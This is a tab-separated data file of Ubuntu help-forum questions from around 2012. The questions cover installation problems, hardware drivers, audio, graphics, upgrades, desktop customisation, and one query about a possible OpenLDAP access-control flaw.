151415	why does my lubuntu software centre only show installed apps ?	the title is self explanatory but here is a big screenshot to emphasize what i mean as you can see i have the get software tab open with the all section selected . any suggestions ?
151420	dell precion m6600 touch screen cursor problems	i have a dell precision m6600 and installed ubuntu 12.04 . the cursor jumps around all by itself when i 'm not even touching the keyboard . when i try to type the cursor goes crazy and clicks and jumps all over the place making it impossible to type ; eventually it freezes and i ca n't type , click or use the key board . any ideas on how to fix this ?
151432	how can i save my existing ubuntu wubi installation when i re-install windows 7 ?	i have installed ubuntu 11.10 inside windows 7 ( c : drive ) using wubi . i want to re-install windows 7 , but i do n't want to delete the existing data and configuration settings which are in my ubuntu wubi install . if i move the ubuntu folder from the c : drive to another drive and then re-install windows 7 , how can i restore my ubuntu 11.10 wubi install ? how can i get back my data and everything of ubuntu after re-installing windows ? is there any way that i can use my hard disk created in ubuntu ?
151433	which other `` photo booth '' program can i use besides cheese ( on a toshiba ac100 ) ?	after installing ubuntu 12.04 on a toshiba ac100 several days ago , as described at https : //wiki.ubuntu.com/arm/tegra/ac100 , and seeing during the installation that the os was able to use the camera ( the installer suggested to make a photo for the first user ) , i wanted to play with the camera . i could n't understand how to find a `` photo booth '' program in the new-style menu+desktop ( not the classical menu with sections ) , so i remembered the popular `` cheese '' linux program , and installed it via the software update tool ( or whatever it is called ; can be invoked from the panel on the desktop ) . but cheese does n't start , i.e. , it crashes . ( the bug report telling the same . ) as i said , the camera could be used by the os on this machine -- this could be seen in the installer . which `` photo booth '' programs can be installed and used without crashes in ubuntu 12.04 on a toshiba ac100 in order to play with the webcamera ?
151435	rename files with a shift in numbers	i want to rename a bunch of files which are called img0189.jpeg img0190.jpeg etc to something like img01.jpeg img02.jpeg etc respectively . are there any way doing this using rename command ? or anything else ? i tried reading the manual but it 's very brief and does n't give any idea about shifting numbers .
151438	why do n't i have ubuntu tweak setting to mute/enable ubuntu login sound ?	ever since i installed ubuntu 12.04 , i could n't figure out a way to enable the login sound . i already have ubuntu tweak installed and i have been at this question , but on my ubuntu , there is not any setting to mute/enable login sound at `` login settings '' tab , only to change the theme . also i 've tried the following : http : //www.ubuntugeek.com/how-to-enable-startup-login-sound-in-ubuntu-12-04-precise.html and http : //www.liberiangeek.net/2012/05/enable-gnome-login-sound-in-ubuntu-12-04-precise-pangolin/ none of them worked . anyone has any idea on why i ca n't change login sound settings ? i 'm sure the sound is not muted at login screen .
151440	important things to do after installing ubuntu server	i just installed ubuntu server on a vps . to configure the server i 'm reading the ubuntu server guide . but the ubuntu server guide does n't tells me everything . e.g . the ubuntu server guide does n't tell me about how to secure ssh , which is , in my opinion , an important thing to do after installation of a server . i know that i 've to secure ssh access , but i might forget things to configure . because i do n't know what i do n't know . does a complete guide exists which tells me which important things i 've to after installing ubuntu server ? if not , can anyone tell me those things ?
151441	adding canon pixma mx870 printer	i 've been trying to do some research on these forums to see how i can add my printer wirelessly . the first approach i found was with this thread http : //ubuntuforums.org/showthread.php ? t=1475336 but unfortunately when i follow the steps it gives me an error . second , i found a post that told me to add a ppa : sudo add-apt-repository michael-gruz/canon but all that does is raise a nodistrotemplateexception . i 'm not sure what that exception means , but i was just wondering if anyone else had these problems and how to succeed .
151443	desktop sharing using router	i have a mac running osx 10.7.4 and a ubuntu machine running 12.04 , both connected to the same router . i am able to use desktop sharing and vnc viewer to see my ubuntu desktop from my mac , but it is slow and it takes a lot of bandwidth . so i was wondering if there is a way i can do the same ( see ubuntu from my mac ) using the router as an intermediary without using the internet . i checked this post sharing desktop with osx in lan but its not very clear to me whether there is an option .
151445	which ati/amd , or intel , or nvidia graphics for unity ?	i really want to know which one of them better for running unity 3d or gnome 3 shell . i 'm specifically interested in this for desktop , not laptop , computers .
151454	how to run alias in background ?	is it possible to run this u2be2mp3 ( ) { youtube2mp3 `` $ @ '' > /dev/null ; } in background ? it 's part of the .bashrc , and if i use it this way : '' u2be2mp3 ( ) { youtube2mp3 `` $ @ '' > /dev/null & ; } '' i 'll get a syntax error .
151456	creating a live cd with gnome-classic as default environment ?	i 'm not sure if this will fit into the categories of other questions on here ; if it does , please lead me to the right post ? i want to create a 12.04 live cd that , instead of having unity ( ubuntu ) installed , has gnome classic ( gnome-session-fallback ) as the only desktop environment ? i want to compile this for people that i know that would be more comfortable trying ( and hopefully switching to ) ubuntu but would not like the unity shell . i want to have a live cd ready for those people so that they wo n't have to install it , add gnome classic , then try to see if they like it . is this possible , and if so , does it requiring compiling a cd from the source ? edit : rather than limiting this to live cd , i want to do this for a live .iso so it can be done on cd/dvd/usb .
151461	how can i upgrade from ubuntu 10.10 to 12.04 ?	i have been struggling to get to 12.04 for one of my three systems supporting mythtv . there have been multiple false starts and not working functionality . furthermore , unity severely upsets my working style . is there a way to do this ?
151467	how can i get a command to run before login ( ie while booting or just after ) ?	i have an encrypted home folder , so i ca n't log in automatically ( and i would n't want to ) but also my display defaults to the minimum brightness at each boot . to fix this i run the command `xbacklight =100` as a startup application , but this only runs when i log in and not when a guest logs in or for the login screen which is beautiful , but not seen . a fix for the whole issue would be preferred , or just a way to run commands during the boot process . thanks .
151471	how to install libdvdcss ?	i 'm relatively new to ubuntu and i 'm trying to figure out how to play dvds . i 've read through a lot of forums , and got to the one asking how to read encrypted dvds . i was able to do the first step and installed libdvdread4 , but when i got to the second step of installing libdvdcss , i got what amounted to error messages . this is the command i ran : sudo /usr/share/doc/libdvdread4/install-css.sh is there something important that i should know ? as in , probably something basic that i do n't know because i 'm new ... ?
151472	no sound after updating from 11.10 to 12.04	hi i updated a friends computer from 11.10 to 12.04 and the sound stopped working in the built-in speakers . the computer is a sony vaio pcg-2j1l . i tried using the guide found here : https : //help.ubuntu.com/community/hdaintelsoundhowto and still no luck . $ cat /proc/asound/card0/codec* | grep codec codec : realtek alc889 $ cat /proc/asound/card0/pcm0c/info card : 0 device : 0 subdevice : 0 stream : capture id : alc889 analog name : alc889 analog subname : subdevice # 0 class : 0 subclass : 0 subdevices_count : 1 subdevices_avail : 1 cat /proc/asound/card0/codec* output can be found here http : //paste.ubuntu.com/1043188/ if anymore information is needed just let me know and ill post it here . thank you in advance for any help with this issue .
151478	boot failure on custom made system	i just built my first system . g.skill value series 8gb ( 2 x 4gb ) asrock h55m-le lga intel i5 i wanted to try ubuntu 12.04 , so i loaded it onto a flash drive and booted the computer . everything worked fine . it loaded fine , i installed to a hard drive , and restarted . now my computer wo n't boot up . it does n't get to the bios screen when booting from the hard drive . when i boot from the flash drive , i let it auto boot and just after the bios it craps out . it is like there is no video . i have n't the foggiest of ideas what the hell is going on . i am uploading a video from my cell phone to youtube so you can see what it is doing . i thought maybe that would help http : //www.youtube.com/watch ? v=trt9goim_d4 & feature=plcp 'sorry for the crap quality and shakes ' any help is appreciated and if there is anymore info you need just let me know .
151481	i need some help with the windows installer	i am having some trouble installing ubuntu 12.04 with the windows installer . the instructions at http : //www.ubuntu.com/download/help/install-ubuntu-with-windows say ( in step 7 ) that i chose to boot with ubuntu , but the black screen does n't come up : it just goes straight to windows . i 've tried to boot it from a usb stick but it wo n't read it until windows boots up . so can anyone help me ? some computer info : hp pavilion 520n not on the internet windows xp home edition version 2002 service pack 2 intel ( r ) celeron ( tm ) cpu 1300mhz 1.30 ghz , 510 mb of ram i think that 's all you 'll need .
151487	import `` prompts '' in quickly ( simple player tutorial )	i am following this tutorial on quickly . at one point iâ have to write from quickly import prompts in the file called simpleplayerwindow.py . but when i do that and run my application , i get the following error : from quickly import prompts importerror : can not import name prompts in the python console idle , i tried to launch the command help ( `` quickly '' ) and this is the output : help on package quickly : name quickly file /usr/lib/python2.7/dist-packages/quickly/__init__.py module docs http : //docs.python.org/library/quickly package contents api builtincommands bzrbinding commands configurationhandler coreupgrade launchpadaccess quicklyconfig templatetools tools version so there is no `` prompts '' listed . what should i do ? are my programs updated ?
151488	what is the best way to learn how to use ubuntu with terminal ?	frequently , there are some things we need to do , tweak system settings , execute some processes , however even on ubuntu , sometimes there is n't a gui to perform such tasks , which is why we come to places like ubuntu forum , askubuntu or even search on google . then someone provides us a terminal command that allows us to do whatever we need at that moment to solve a certain problem . so i see that learning the language behind linux can be extremely useful . but all i 've been doing so far is to execute the commands , sometimes i do n't even understand what i 'm doing while executing them , i am just following instructions from someone else . i would like to understand more about linux in general and ubuntu in particular , i do n't want to master linux or run everything on terminal , i like ubuntu just fine for modern pc 's , user-centric and graphical , but i just would like to know the basics and at least to be able to understand what a certain command is going to do on the system . what is the best way to do this ?
151493	reduce avi size without losing too much quality	i have a few gbs in .avi videos and i want to convert them to some other format to reduce their size but i do n't want to lose a lot of quality , there 's text and other graphics in the video than need to be good enough to read . i tried winff from the ubuntu software center , and the only format that reduced the size was flv but the quality was really poor . how can i reduce the size of these .avi files without losing too much quality ? also i do n't want to compress them all in something like a zip file .
151494	why ca n't i watch video after installing the original ffmpeg fork from jon severinson 's ppa ?	i just installed the jon severinsson ffmpeg ppa , and i cant watch any video and get audio only , i get a need extra plugins needed install ? and then packaged dependencies could no be resolved . here are the screenshots , any help ?
151498	how to install bastion from .sh file ?	i have downloaded bastion from hib v ; though , when i execute the .sh file in terminal , nothing happens . can anybody help me installing it ? thank you : )
151504	preventing wine from disabling my second monitor	i am trying to play league of legends via wine which i managed to get a stable 60 fps from , there are just a couple problems i am encountering . whenever the actual game starts , wine disables my second monitor . i can easily turn it back on without any problems using : xrandr -s 0 option 0 being the 3360x1050 option . i have found a couple of ways to solve this but all seem to have drawbacks . if i switch from twinview to xinerama wine does n't disable my second monitor but then i only get about 12 fps . i read that this is because xinerama disables graphics acceleration . if i set wine up to run a virtual desktop this works except this means i can not run in fullscreen . perhaps there 's a way to make the virtual desktop fullscreen by default ? i can set the resolution to 1680x1050 but i will still have the gnome-panel bars appear at the top and bottom . i wonder perhaps if there is a way for me to remove the 1680x1050 option from xrandr and only have the 3360x1050 option ?
151505	how to show avatar and username ( not only full name ) on the login screen ?	i used ubuntu tweak to change the login background , but i need these other things as well : show username ( not only full name ) and avatar if possible , in the login screen any ideas how to achieve this ?
151510	how can i resolve dpkg dependency problems ?	$ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 8 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up unity-2d-common ( 5.12.0-0ubuntu1.1 ) ... ( gconftool-2:13920 ) : gconf-warning ** : failed to load source `` xml : merged : /tmp/gconf-pftj8n/gconf '' : failed : could not make directory `/tmp/gconf-pftj8n/gconf ' : permission denied ** gconf : error : gconftool.c:969 : main : assertion failed : ( err == null ) dpkg : error processing unity-2d-common ( -- configure ) : subprocess installed post-installation script returned error exit status 250 dpkg : dependency problems prevent configuration of unity-2d-panel : unity-2d-panel depends on unity-2d-common ( = 5.12.0-0ubuntu1.1 ) ; however : package unity-2d-common is not configured yet . dpkg : error processing unity-2d-panel ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-spread : unity-2d-spread depends on unity-2d-common ( = 5.12.0-0ubuntu1.1 ) ; however : package unity-2d-common is not configured yet . dpkg : error processing unity-2d-spread ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-shell : unity-2d-shell depends on unity-2d-common ( = 5.12.0-0ubuntu1.1 ) ; however : package unity-2d-common is not configured yet . dpkg : error processing unity-2d-shell ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d : unity-2d depends on unity-2d-panel ; however : package unity-2d-panel is not cno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already onfigured yet . unity-2d depends on unity-2d-spread ; however : package unity-2d-spread is not configured yet . unity-2d depends on unity-2d-shell ; however : package unity-2d-shell is not configured yet . dpkg : error processing unity-2d ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-launcher : unity-2d-launcher depends on unity-2d-shell ; however : package unity-2d-shell is not configured yet . dpkg : error processing unity-2d-launcher ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-places : unity-2d-places depends on unity-2d-shell ; however : package unity-2d-shell is not configured yet . dpkg : error processing unity-2d-places ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-dbg : unity-2d-dbg depends on unity-2d ( = 5.12.0-0ubuntu1.1 ) ; however : package unity-2d is not configured yet . dpkg : error processing unity-2d-dbg ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : unity-2d-common unity-2d-panel unity-2d-spread unity-2d-shell unity-2d unity-2d-launcher unity-2d-places unity-2d-dbg e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried a lot and ca n't get this working . i think i interrupted an install and it just screwed it all up . i 've googled and tried various fixes .
151511	need a driver for oki mc160n printer	i ca n't find a driver for my oki mc160n printer . how can i use this printer in ubuntu ?
151513	reload gtk+ 3.0 theme	i 'm trying to customize my gtk+3.0 theme , when i make a change in my theme , i change between two themes ( with myunity ) to force applications to reload the theme and test mine . but when i do that , the theme is not refreshed to appreciate my changes , still in an old version , apparently gtk+ is caching the theme information somewhere . when i close and reopen session , i can appreciate my theme changes , but doing this for each change made is very annoying . is there a way to refresh my theme and see my changes ( a command line program or an gtk+ api call for example ) ?
151514	when i hit ctrl-alt-f1 i get a black screen	i just installed ubuntu 12.04 on my laptop but when i boot it up i get the gnome menu and then when i pick the first option , i get `` ubuntu 11.10 '' with five dots under it but it will go no further . i hit ctrl+alt+f1 , i get a black screen , and if i try `` recovery '' i get a message there is no data found . pressed escape instead of ctrl+alt+f1 starting modem connection manager failed starting cups printing spooler/server failed
151515	setup lan connection with windows guest	i want to setup a samba server on my ubuntu host for my windows guest in virtual box . the question is : how can i achieve this or is it possible ? note : i am not trying to use the shared folder feature of virtual box . i used that feature already . please remember that i have only a physical machine . the other one is virtual .
151519	what quickly templates are available	how to get list of official an unofficial quickly templates . i googled it , but did'nt got any satisfactory result .
151524	is there any way to use ubuntu with an android phone ?	could i plug in my android phone into my ubuntu pc via usb cable and have text messages and such appear in my ubuntu notifications ? or something like that ( similar to the ubuntu for android application being developed , except i could plug my phone into my pc which is already running ubuntu ) .
151527	how to cancel an installation in the software center ?	i tried installing matlab from the software center out of curiosity , without having installed the executables . this led to the install unable to complete . i closed the gui of the installer window , but that did not cancel the install . i see no cancel button .
151529	how do i prevent screensaver to come up when watching full-window videos ?	i ca n't prevent the screensaver from coming up when watching videos in full screen mode . is there any way to fix this ?
151533	quickly does n't push - intended ?	i have setup quickly with my launchpad project quickly configure bzr lp : ~me/projectname/trunk but when i do save , share or release , no code is pushed to the repository . is this supposed to happen ? if not , what would be the correct workflow ; 1 ) bzr push then 2 ) quickly share ? because the latter affects the files . or should it be the other way around ?
151535	installing internet explorer and windows media player in ubuntu ?	i need to install internet explorer and windows media player to check an url for testing purpose . could someone post me the exact steps to acheive this task ? note : i have already tried installing ie in ubuntu 10.10 and later versions ( 12.04 ) with wine . it works fine . but i do n't get success installing windows media player . hope someone will solve my problem . it will be great if someone gives me a neat solution for installing ie and wmp in ubuntu ( 10.10 or later ) .
151539	how to install oracle java web plugin on chrome in 12.04 ?	i 've tried a whole lot of guides , but at best i ended up with neither google chrome not firefox registering the java plugin . i specifically do not need openjdk or icedtea - i need the sun/oracle version . the reason being is that http : //www.gaikai.com does not support anything different . does anyone have any tips on getting it working ?
151552	unable to configure/setup 5.1 audio with 12.04	i am kinda new to ubuntu . i have been having this issue with audio for quite sometime now . initially , when i installed version 11.10 ( i guess ) , i was able to use my 5.1 speakers without any issues . if my memory serves me right , it was after an update that the 5.1 audio stopped working and the video resolution would not get saved . i temporarily fixed the resolution issue by creating a start-up shell script that would update the resolution and load it . but the issue with audio has been going on for quite sometime now . even though i have option for 5.1 , only two speakers seem to be working . i thought an upgrade should fix the issue and so upgraded the os to version 12.04 . i also tried uninstalling alsa and pulse audio , reinstalling them , changing the /etc/pulse/daemon.conf channels from 2 to 6 . i have also tried installing pavucontrol but nothing seems to have worked and the issue still persists . the lspci log on my computer is as follows 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 10 ) 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) i would really appreciate a response that will assist me in resolving my issue -- thanks !
151553	gnome shell opens as classic	i 'm running 12.04 on a gateway lt4004u netbook . my graphics card is an integrated intel gma â3600 . i 'm not sure whether or not it supports 3d , i have been unable to find any information via google or gateway 's website . i installed gnome3 using the apt-get commands in the terminal . when i rebooted and ran `` gnome shell '' it opened up classic mode . i thought that my cursor might have slipped the first time , but on multiple retries logging in under gnome shell would open the gnome classic desktop . i even uninstalled gnome shell and reinstalled it with software center , but i still have the same problem . i was wondering if this might be an issue with my graphics card ? any help would be much appreciated , thanks ! -joe
151560	which vcs to use for ubuntu development ?	i want to start contributing to ubuntu projects and while going through the beginner 's guide , i noticed that the suggested vcs for ubuntu development is bazaar . i currently use git and find it very easy to work with . in such a case , would it be wise for me to adopt bazaar for my ubuntu projects . in what ways , if any , is bazaar better than git ?
151563	adobe air workaround for pandora not working	i was trying this symbolic link approach because of the problem described here : http : //askubuntu.com/a/120221/70462 after i made the symlink , the installation proceeded further than before , but it eventually asked for my password ( in an extra small x-term window within the air installation window ) . when i typed in my password , it told me there was an authentication failure . i tried about 8 times total ( on 3 separate install attempts ) , but even when i was certain i was typing my password correctly , it would tell me there was an authentication error . specifically the text in the x-term window was : titlebar : xdg-su : /tmp/air.x0rsdf/setup term : this application requires administrative rights to run please enter root password : su : authentication failure please enter root password : any ideas ?
151567	super meat boy gives black screen but sound works [ nvidia x64 12.04 ]	i recently purchased and redeemed the latest humble indie bundle through the usc . all of the games that i 've tested so far work great ( i 've already beaten bastion ) . i can launch super meat boy , but it only makes my screen turn black and i can hear the game sounds . i have a nvidia 560 using the latest proprietary drivers and x provided by the x-swat repository . this is on kubuntu 12.04 and my system is entirely up to date . if it also helps to know , i am running a dual screen setup and most games seem to fullscreen to both monitors ( as one big desktop ) .
151569	command not working	whenever i press alt+f2 to open the command window and i enter a command , such as reset -- unity or 'sudo apt-get install startupmanager ' , no window pops up . is this a glitch with ubuntu , or am i overlooking something ?
151571	how do i install lubuntu ? ( kernel panic )	please help me install lubuntu 12.04 i386 on an old computer . i select the `` try lubuntu without installing '' and it crashes with a kernel panic . rarely i do get to the live os , but soon the display goes blank . the messages log gives me ' [ drm ] error gpu hung/wedged ' the specs are : pentium 4 2.4ghz 1gb ddr ram 40gb pata hdd intel 845gl chipset ( 8mb framebuffer , 64mb shared system memory set in the bios )
151574	error while installing libx11-devel , package can not be found	i was installing [ htk speech recognition kit ] [ 2 ] from source . when i gave make all it is giving following error : ( cd htklib & & make htklib.a ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/krishna/htk/htklib' gcc -ansi -d_svid_source -doss_audio -d'arch= '' i686 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hgraf.o hgraf.c hgraf.c:73:77 : fatal error : x11/xlib.h : no such file or directory compilation terminated . make [ 1 ] : *** [ hgraf.o ] error 1 make [ 1 ] : leaving directory `/home/krishna/htk/htklib' make : *** [ htklib/htklib.a ] error 1 i searched regarding this error [ and found that ] [ 3 ] : i need to install package libx11-devel . $ sudo apt-get install libx11-devel reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libx11-devel but it seems that the package does not exist .
151584	how to copy existing movie files on ipad to watch ?	i have an ipad and a desktop running ubuntu 12.04 with lots of movie files of various formats ( avi , mp4 , m4v , etc ) . is it possible to transfer those files from within linux directly to the ipad ( without using itunes to sync ) over usb and then play those movies on the ipad without reformatting/resizing all of them ? i 've used itunes in a windows xp virtualbox instance with other ios mobile devices before but i would prefer a pure linux approach if possible . ( i 'm creating this question so that i can share the solution i found because i failed to find a simple , satisfactory answer elsewhere ) .
151590	what is the default permission for /var/www ?	after upgrading to 12.04 , i had to reinstall the lamp stack . then i brought all my www project folders from a pen drive to the /var/www folder ( using sudo nautilus , and dragging the files in there ) . now i can not make any changes to the files/directories within /var/www . perhaps this changed with the backup copies i dragged in there . i 'd like to know what the default permissions for the /var/www folder are . i do n't want to just change the permissions and make my system abnormal and working . rather i 'd like to get it to the correct state that is meant to work .
151595	could n't find package ia32-libs	i am not able to install these libraries . where should i download these from and how to install them ?
151601	can i automate updating/upgrading with sudo in this way ?	please consider this code : alias fast='echo `` password '' | sudo -s apt-get update & & sudo -s apt-get upgrade' i have not yet had a problem using it but is it possible that if the first step , apt-get update takes a very long time , the password would lapse by the time the apt-get upgrade commands finally runs ?
151603	wireless stopped working after 3.2.0-25 upgrade	today , i downloaded the 3.2.0-25 kernel as suggested by software update . after restart , my wireless is n't working , does n't even show up in the network manager . if during boot , i choose the previous kernel 3.2.0-24 , everything is hunky dory my machine is an hp h9xt with a rt5390sta wireless card . andrew
151608	details window showing `` unknown '' driver for graphics	i have intel graphics card , which have model number gm965 . it is on a notebook , ( lenovo 3000 y410 ) . my ubuntu installation worked good until i upgraded to 12.04 . it was a fresh install . the graphics performance is poor compared to natty , oneiric . in the details tab of system settings , graphics driver is shown as `` unknown '' . i have upgraded the xserver-xorg-video-intel package to version 2.19.. from 2.17 . but still same . so , my question is is there any other method to fix the problem with graphics showing as `` unknown '' ?
151615	how do i list the public files in my home directory ? ( mode 777 )	i want to get the list of all the files in my home folder , having rwx ( read-write-execute ) or 777 permissions for everyone . also , what is the command to know the permissions of a file ?
151616	full-screen , transparent , toggle-able terminal for ubuntu ? ( like quake/visor )	i want to toggle a full-screen transparent terminal on some hotkey , so that when you close it , it just minimizes in the panel/tray but remains loaded in memory . for example , visor on mac os x :
151623	grub does n't display after installing xubuntu 12.04	i just installed xubuntu 12.04 alongside windows xp . i specified my own partitions . however , on boot grub does n't seem to appear with the monitor showing `` no signal '' . after approximately 10 secs ( the default wait time on grub ) it boots directly into xubuntu . graphics card is ati radeon xpress 200m .
151631	how to run cli commands from the launcher ?	i press alt+f2 key on my keyboard , and get the launcher hud up . from there i enter a command as i would in a shell , specifically vlc ~/music/* -z . if done from a shell , vlc starts and begins to play music . however , when done from the launcher , vlc replies : file reading failed : vlc could not open the file `` /home/ [ username ] /music/* '' . ( no such file or directory ) user your input ca n't be opened : vlc is unable to open the mrl 'file : ///home/ [ username ] /music/ % 2a ' . check the log for details . i ca n't quite figure out what the difference is .
151636	how can i change the eclipse tooltip background color from black to white ?	it 's hard to read tooltips in eclipse in ubuntu 12.04 ; how can i change the colors ? before ubuntu 12.04 , it could be changed with tooltip system color in `` appearances '' . how could i do this in 12.04 ? fixed : how to change tooltip background color in unity ? - all i need .
151640	problem with hibernation	i just upgraded my ubuntu 11.10 to 12.04 . i have problem with hibernation in my new 12.04 . i run the following command , sudo pm-hibernate but my system does not hibernate , i.e . my system does not turn 's off rather the screen just flashes out for few second 's and resumes previous state . how do i fix this problem and enable hibernation on my system ?
151641	ubuntu 12.04 usb audio card roland duo-capture not recognized	i need high quality usb audio card for ubuntu 12.04 pcs so i bought roland duo-capture which is very promising . the problem is that with : cat /proc/asound/cards i can see only the integrated audio card 0 snd_hda_intel while issuing the lsusb i see the device : bus 004 device 002 : id 0582:012b roland corp. is there a way to have alsa understand this is an audio card ? if there 's no chance to have this usb audio card working on ubuntu , may i have a list of high quality usb audio cards which for sure are supported by ubuntu 12.04 ?
151643	how move firefox bookmarks from windows to ubuntu 11.10 ?	how can i move firefox bookmarks from windows to ubuntu ? i have windows xp on one machine ( which is very old and runs firefox 8 ) and have ubuntu 11.10 on another . i want to copy firefox bookmarks to the ubuntu machine .
151646	how do i get a d-link dwa 140 working ?	i 've created a bootable usb stick , under windows , and checked the disk is ok. load the try ubuntu option and , as with 11.04 and 11.10 , it ca n't find the d-link adaptor .
151648	ca n't login to my xfce environment from lxdm	i installed lxdm as my display manager because i heard its very lightweight . now after installing it when i select my desktop as xfce session i am not able to login . basically what happens is it waits for sometime and than reload the same login page . on the other hand if i select lxde as my desktop i am able to login . so , what am i doing wrong here . the other problem i am facing with lxdm is it does n't show my default user account . i have to select more and enter both my username and password to login into any session .
151650	tweak that allows osx-like stacks in unity launcher	i know there is a way of doing it in cairo dock ( see this q & a ) , but i love the unity launcher and would like to keep using that . i 've spent so much time working with stacks before that starting to use the dashboard to get to stuff is counterproductive for me . is there any tweak that allows stacks ( not quicklists ) in the launcher ? ps dean howell suggested using the files lens , and frankly it is sort of what i am looking for , but invoking it takes long enough so that it defeats the purpose of using it in the first place . but this gave me an idea . is it at all possible to `` dock '' a lens on the launcher , so that it would show the dash focused on a certain directory ?
151651	brightness is reset to maximum on every restart	the brightness of my laptop is reset to max on every restart . i tried the solution provided at this website but had no luck . http : //ubuntuguide.net/how-to-save-screen-brightness-settings-in-ubuntu-12-04-laptop/ this command cat /sys/class/backlight/acpi_video0/max_brightness returns cat : /sys/class/backlight/acpi_video0/max_brightness : no such file or directory then i go on to find that i do n't have any folder named acpi_video0 but a folder called intel_backlight every time i increase or decrease the brightness using the brightness control keys the `` brightness '' and the `` actual_brightness '' values get updated . is there any method i could follow to set the brightness to a fixed value on everyboot and vary it as and when i need it using the brightness control keys .
151652	in unity 's dash , how do i change the font colour ?	i seem to have white font over a white background when i press `` super '' or the dash button on the launcher . can i change the font colour or make it darker in the dash ?
151654	lightweight browser for ubuntu jaunty	i am looking for a lightweight and stable browser for ubuntu jaunty . i tried midori , however the version from the jaunty-repository seems not to be very stable ( crashes for example when going to youtube ) .
151656	is there an 'extract to ... ' context menu option for the archive manager application in nautilus ?	i was wondering if there was an easy way to add an 'extract to ... ' option in the context menu for the archive manager in nautilus ? 'extract here ' is fine a lot of the time but i 'm often working with a lot of archives whose content is just 'loose ' within the archive and i want it extracted in to a sub-folder for better organisation . having to manually create the folder first becomes really tedious when dealing with lots of archives . i was also hoping that it would be possible for this ( or another ) function to automatically create a folder with the same name as the archive and extract the contents there . again for ease of management and so i do n't have to keep typing out long complicated archive names by hand . thanks for any help you can offer .
151661	updating & upgrading	i am running ubuntu 10.04 and i am very interested in upgrading to the new 12.04 , but my update manager wo n't recognize that the new version is out apparently because when i run it.. all it says is that the newest version is 10.10 and that it is n't supported ... . i am fairly new to using linux ubuntu os and already i love the freedom i get from it.. i would greatly appreciate it if you at ubuntu could help me make the most of my experience.. please help me understand why i ca n't automatically upgrade to 12.04 or atleast 11.10 . thank you for your time in reading this , -joshua mason
151662	security hole in ldap configuration of serverguide ?	i 'm just setting up a new openldap server for user authentification and stumbled over the access control statements in the serverguide . in especially : access to * by self write ... as the access to the `` uidnumber '' attribute is n't prohibited by a previous statement , this allows any user with an ldap account to change their `` uidnumber '' to 0 ( root ) and login using their default credentials and become root ( or someone else ) . at least this is possible on my setup , with this acls . am i missing something ?
151663	console mode oddities	ubuntu 12.04 can be started in console mode ( without gui ) by adding the file /etc/init/lightdm.override with the content manual : echo manual | sudo tee -a /etc/init/lightdm.override when i start ubuntu in console mode , however , there are three odd things happening : the command startx reads my .xsession file ( rather than .xinitrc ) . my .xmodmap with key mappings is no longer read . when i exit x windows the computer hangs with a black screen . any clues ?
